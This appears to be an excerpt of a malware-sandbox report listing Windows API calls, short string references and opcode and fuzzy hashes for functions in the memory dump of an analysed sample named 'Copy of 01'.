                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: CounterPerformanceQuerySleep
                        • String ID:
                        • API String ID: 2875609808-0
                        • Opcode ID: 8cc352cc95c4bdd5cd90a2eaedf631f473f4fe06673d4f36ff2e97c4632d3168
                        • Instruction ID: 5aa50fccbcf7564c65267e614600d0050d59634a18402beb44df3b7498229d0a
                        • Opcode Fuzzy Hash: 8cc352cc95c4bdd5cd90a2eaedf631f473f4fe06673d4f36ff2e97c4632d3168
                        • Instruction Fuzzy Hash: 8E115B31C0162DE7CF02AFE5EA69AEEFB78FF49711F114095D981B2281CB3056508B91
                        APIs
                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00392DC5
                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00392DD6
                        • GetCurrentThreadId.KERNEL32 ref: 00392DDD
                        • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00392DE4
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                        • String ID:
                        • API String ID: 2710830443-0
                        • Opcode ID: 1e131850ba63beed908f9e0f919ec2a0ea450831763c013580ccfcb22db6d554
                        • Instruction ID: 6e8126733ea5ce9b9ad53f958f15ac74ecd2fa22d482779ac12e2a905dc37453
                        • Opcode Fuzzy Hash: 1e131850ba63beed908f9e0f919ec2a0ea450831763c013580ccfcb22db6d554
                        • Instruction Fuzzy Hash: E5E09272511624BBDB221B739C0DFEB3E6CFF42BA1F051015F10AD10809AA4D841C7B0
                        APIs
                          • Part of subcall function 00349639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00349693
                          • Part of subcall function 00349639: SelectObject.GDI32(?,00000000), ref: 003496A2
                          • Part of subcall function 00349639: BeginPath.GDI32(?), ref: 003496B9
                          • Part of subcall function 00349639: SelectObject.GDI32(?,00000000), ref: 003496E2
                        • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 003C8887
                        • LineTo.GDI32(?,?,?), ref: 003C8894
                        • EndPath.GDI32(?), ref: 003C88A4
                        • StrokePath.GDI32(?), ref: 003C88B2
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                        • String ID:
                        • API String ID: 1539411459-0
                        • Opcode ID: 4a7e274542595e6cc300e918bfbc01b8c5e7437813a8b9f5ffb9f72a5a71363b
                        • Instruction ID: c4635529b6e2cdfe5eab2eb93f124e35ee15b94bbdbf3a06372a1541eb54aacc
                        • Opcode Fuzzy Hash: 4a7e274542595e6cc300e918bfbc01b8c5e7437813a8b9f5ffb9f72a5a71363b
                        • Instruction Fuzzy Hash: CDF05E36041268FADB135F94AC09FDE3F59AF06310F048004FA55A50E1CB756A11CFE9
                        APIs
                        • GetSysColor.USER32(00000008), ref: 003498CC
                        • SetTextColor.GDI32(?,?), ref: 003498D6
                        • SetBkMode.GDI32(?,00000001), ref: 003498E9
                        • GetStockObject.GDI32(00000005), ref: 003498F1
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Color$ModeObjectStockText
                        • String ID:
                        • API String ID: 4037423528-0
                        • Opcode ID: 7a4ceab6c93740830a59c4330dd302ba02eba5efd39777b72af06f0c10142fb0
                        • Instruction ID: 1602d3f96f555994c33ed479ab6d63a595f11100d71a4992173ab72c8c19eded
                        • Opcode Fuzzy Hash: 7a4ceab6c93740830a59c4330dd302ba02eba5efd39777b72af06f0c10142fb0
                        • Instruction Fuzzy Hash: 46E06531654240AEDB225B75BC09FE93F55AB12335F188219F6FDD80E1C372A6419B10
                        APIs
                        • GetCurrentThread.KERNEL32 ref: 00391634
                        • OpenThreadToken.ADVAPI32(00000000,?,?,?,003911D9), ref: 0039163B
                        • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,003911D9), ref: 00391648
                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,003911D9), ref: 0039164F
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: CurrentOpenProcessThreadToken
                        • String ID:
                        • API String ID: 3974789173-0
                        • Opcode ID: 69d46a8ea7b9445362c2006999601dff4cd2a7fdabfc8de4ef4d241e5b69fa2e
                        • Instruction ID: e31dfa392617f8b737990959dd59213d9db59ad25e25368c7372dde19b3fabf5
                        • Opcode Fuzzy Hash: 69d46a8ea7b9445362c2006999601dff4cd2a7fdabfc8de4ef4d241e5b69fa2e
                        • Instruction Fuzzy Hash: C0E08671A11221DBDB211FA0AD0DF463B7CBF44791F194808F649D9080D6389441C750
                        APIs
                        • GetDesktopWindow.USER32 ref: 0038D858
                        • GetDC.USER32(00000000), ref: 0038D862
                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0038D882
                        • ReleaseDC.USER32(?), ref: 0038D8A3
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: CapsDesktopDeviceReleaseWindow
                        • String ID:
                        • API String ID: 2889604237-0
                        • Opcode ID: 924f930554e65b59c789f680c44526dd9978d01b3f40e4db6d68c325a12020e5
                        • Instruction ID: b512835d961f1024dd04219318f288311399d7c6afda3a234cb1257bdaa75af2
                        • Opcode Fuzzy Hash: 924f930554e65b59c789f680c44526dd9978d01b3f40e4db6d68c325a12020e5
                        • Instruction Fuzzy Hash: BBE01AB4810204DFCB42AFA0D90CA6DBBB9FB08310F18A049E84AE7250C738A912EF40
                        APIs
                        • GetDesktopWindow.USER32 ref: 0038D86C
                        • GetDC.USER32(00000000), ref: 0038D876
                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0038D882
                        • ReleaseDC.USER32(?), ref: 0038D8A3
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: CapsDesktopDeviceReleaseWindow
                        • String ID:
                        • API String ID: 2889604237-0
                        • Opcode ID: 224b12c99a0f14cbf6e46fd2c74af0a19bfdc492c6d781d599bb14e6b13b5d8c
                        • Instruction ID: 4baefee4fa827a2eca2d26550109121cea67b1446aed8ba2e54bbfadbabc3e16
                        • Opcode Fuzzy Hash: 224b12c99a0f14cbf6e46fd2c74af0a19bfdc492c6d781d599bb14e6b13b5d8c
                        • Instruction Fuzzy Hash: 6CE09A75810204DFCB52AFA0D94CA6DBBB9BB08311F18A449E94AE7250C739A912DF50
                        APIs
                          • Part of subcall function 00337620: _wcslen.LIBCMT ref: 00337625
                        • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 003A4ED4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Connection_wcslen
                        • String ID: *$LPT
                        • API String ID: 1725874428-3443410124
                        • Opcode ID: c20ff230648b70cae460a2a1b63979d902ddb23ddb35705b7d7c268163916977
                        • Instruction ID: 426641172b707f2575c2e3259d35a0100973cc054898e384091aa8643bb4e4fd
                        • Opcode Fuzzy Hash: c20ff230648b70cae460a2a1b63979d902ddb23ddb35705b7d7c268163916977
                        • Instruction Fuzzy Hash: 8B917D75A002049FDB16DF58C484EAABBF5FF86304F198099E80A9F362C775ED85CB90
                        APIs
                        • CharUpperBuffW.USER32(0038569E,00000000,?,003CCC08,?,00000000,00000000), ref: 003B78DD
                          • Part of subcall function 00336B57: _wcslen.LIBCMT ref: 00336B6A
                        • CharUpperBuffW.USER32(0038569E,00000000,?,003CCC08,00000000,?,00000000,00000000), ref: 003B783B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: BuffCharUpper$_wcslen
                        • String ID: <s?
                        • API String ID: 3544283678-1615119086
                        • Opcode ID: e2982f40bdf4fc0c516f456517016c1117bbe207e195fe1574dd9d7750d421b6
                        • Instruction ID: 7e7d055f2aa427503f5f8219f8423a7f55be55b80a1b5193f5c8619542702fb6
                        • Opcode Fuzzy Hash: e2982f40bdf4fc0c516f456517016c1117bbe207e195fe1574dd9d7750d421b6
                        • Instruction Fuzzy Hash: 8A613C76914119AACF07EBA4CC92DFDB378FF54704F44412AE642BB491EF306A09DBA0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID:
                        • String ID: #
                        • API String ID: 0-1885708031
                        • Opcode ID: f545098ebe377761b9b6d5f8726c14c5ccb373277a82c762cf1d16f692413649
                        • Instruction ID: 9381c54f57cc7bbdb4fe4b9204985b05ee44665c1b5e88cd87a023159f2804dd
                        • Opcode Fuzzy Hash: f545098ebe377761b9b6d5f8726c14c5ccb373277a82c762cf1d16f692413649
                        • Instruction Fuzzy Hash: C6510D35A04346DFDB17EF28C481ABA7BA8FF55310F248599F8919F2D0D674AD42CBA0
                        APIs
                        • Sleep.KERNEL32(00000000), ref: 0034F2A2
                        • GlobalMemoryStatusEx.KERNEL32(?), ref: 0034F2BB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: GlobalMemorySleepStatus
                        • String ID: @
                        • API String ID: 2783356886-2766056989
                        • Opcode ID: 622a5b5041c37e36ffc7662c546b77dedcd5f81597604f64d9a4ab232acc4c1c
                        • Instruction ID: ddfc89ae0779a43aafa48bce5756ef524f63a4b5f91c4a71e7486ebd78214013
                        • Opcode Fuzzy Hash: 622a5b5041c37e36ffc7662c546b77dedcd5f81597604f64d9a4ab232acc4c1c
                        • Instruction Fuzzy Hash: C55155724187489BD321AF10DC86BAFBBFCFB84304F81884CF1D9551A5EB309929CB66
                        APIs
                        • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 003B57E0
                        • _wcslen.LIBCMT ref: 003B57EC
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: BuffCharUpper_wcslen
                        • String ID: CALLARGARRAY
                        • API String ID: 157775604-1150593374
                        • Opcode ID: 2b79e162086735cb76063caca46539fd3e6c03ee33da8b4cf3d3893eb979ed86
                        • Instruction ID: 36e997e9a80ea81184a62703b7189bac12b83c348dbfa312b99e870cd847370e
                        • Opcode Fuzzy Hash: 2b79e162086735cb76063caca46539fd3e6c03ee33da8b4cf3d3893eb979ed86
                        • Instruction Fuzzy Hash: B5419F31A002099FCB16DFA9C882AFEBBF5FF59324F154069E605EB251E7309D81CB90
                        APIs
                        • _wcslen.LIBCMT ref: 003AD130
                        • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 003AD13A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: CrackInternet_wcslen
                        • String ID: |
                        • API String ID: 596671847-2343686810
                        • Opcode ID: d20a387d55f88d3daa71a3fb3a2b2d26dce74a59609bef02674afc0d9bf0a5f8
                        • Instruction ID: bc4f7290c3284479d90da3acf9d19b93762fde2ce5fff4923e66ca5027055a47
                        • Opcode Fuzzy Hash: d20a387d55f88d3daa71a3fb3a2b2d26dce74a59609bef02674afc0d9bf0a5f8
                        • Instruction Fuzzy Hash: 79311A71D00209AFCF16EFA4CD85AEEBFB9FF09300F004019F815AA162D735AA46CB90
                        APIs
                        • DestroyWindow.USER32(?,?,?,?), ref: 003C3621
                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 003C365C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Window$DestroyMove
                        • String ID: static
                        • API String ID: 2139405536-2160076837
                        • Opcode ID: 08aacfb58fda397b29959792b533b44ab5e82711ac3bfb6caa30d1e3ec1fc537
                        • Instruction ID: 5aa879ff08f4e3a94ed824963f3a46f977d6773227ac1083a05962ab0df11307
                        • Opcode Fuzzy Hash: 08aacfb58fda397b29959792b533b44ab5e82711ac3bfb6caa30d1e3ec1fc537
                        • Instruction Fuzzy Hash: AC31AA71110204AEDB129F68CC81FFB73A9FF88720F01961DF8A9D7280DA35AD91CB60
                        APIs
                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 003C461F
                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 003C4634
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: MessageSend
                        • String ID: '
                        • API String ID: 3850602802-1997036262
                        • Opcode ID: b3fdd9dbdf9bd3fcc9df18c858fb1b2cae54f3371888b0c0e841733c03f015f1
                        • Instruction ID: dddf9b455e1026c7b5cf68a53eea927bd23222a3fff046d2d862bad0a600bf5f
                        • Opcode Fuzzy Hash: b3fdd9dbdf9bd3fcc9df18c858fb1b2cae54f3371888b0c0e841733c03f015f1
                        • Instruction Fuzzy Hash: 62311774A002099FDB15CF69C990FDABBB5FB49300F14406AE904EB351D770AD51CF90
                        APIs
                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 003C327C
                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003C3287
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: MessageSend
                        • String ID: Combobox
                        • API String ID: 3850602802-2096851135
                        • Opcode ID: fcc98305ec75322e6aa82acf8f717d4556e491fdbc85bb52afb42090d5f64089
                        • Instruction ID: eb1cc43a44d0f9ecd4d586f8da7da1e875717be558ce1f6e9b264a5766427801
                        • Opcode Fuzzy Hash: fcc98305ec75322e6aa82acf8f717d4556e491fdbc85bb52afb42090d5f64089
                        • Instruction Fuzzy Hash: F711B2713002087FEF269F54DC81FBB776EEB94364F118529F918DB290D671AD518760
                        APIs
                          • Part of subcall function 0033600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0033604C
                          • Part of subcall function 0033600E: GetStockObject.GDI32(00000011), ref: 00336060
                          • Part of subcall function 0033600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0033606A
                        • GetWindowRect.USER32(00000000,?), ref: 003C377A
                        • GetSysColor.USER32(00000012), ref: 003C3794
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                        • String ID: static
                        • API String ID: 1983116058-2160076837
                        • Opcode ID: d32068b7eb71e5e9682f38639bbfbd7675cca40a5df86f5e2c1ee6e8aa3ea416
                        • Instruction ID: fd3f893cb346b5edf44789615b399d28565b99f52191c968c39f8e5ab992ec97
                        • Opcode Fuzzy Hash: d32068b7eb71e5e9682f38639bbfbd7675cca40a5df86f5e2c1ee6e8aa3ea416
                        • Instruction Fuzzy Hash: E7113AB2610209AFDF02DFA8CC46EEA7BF8FB09314F015518F955E2250D735ED519B50
                        APIs
                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 003ACD7D
                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 003ACDA6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Internet$OpenOption
                        • String ID: <local>
                        • API String ID: 942729171-4266983199
                        • Opcode ID: 6ad34f51750db7a8759919cdb8d0fd5082002a6e68a503ec0687e799d7c8cf08
                        • Instruction ID: cc53262a50907b1ce237b1873a03db62a2566ae9d5006443c45bd8a831f216ef
                        • Opcode Fuzzy Hash: 6ad34f51750db7a8759919cdb8d0fd5082002a6e68a503ec0687e799d7c8cf08
                        • Instruction Fuzzy Hash: B511C271225635BAD73A4B668C49EF7BEACEF137A4F00522AF11983580D7709840D6F0
                        APIs
                        • GetWindowTextLengthW.USER32(00000000), ref: 003C34AB
                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 003C34BA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: LengthMessageSendTextWindow
                        • String ID: edit
                        • API String ID: 2978978980-2167791130
                        • Opcode ID: 0ed42766979bd3b4ef556b64e2a387b54fdf9e983ba4b93e84c44aec53b53161
                        • Instruction ID: d740fc2069bc19ed050203526647bee8a79637d8cfbb0f2e3a9af368e266de48
                        • Opcode Fuzzy Hash: 0ed42766979bd3b4ef556b64e2a387b54fdf9e983ba4b93e84c44aec53b53161
                        • Instruction Fuzzy Hash: D6118871100208AAEB178E65DC80FAA36AAEB05374F518328F964D71E0C731ED519B60
                        APIs
                          • Part of subcall function 00339CB3: _wcslen.LIBCMT ref: 00339CBD
                        • CharUpperBuffW.USER32(?,?,?), ref: 00396CB6
                        • _wcslen.LIBCMT ref: 00396CC2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
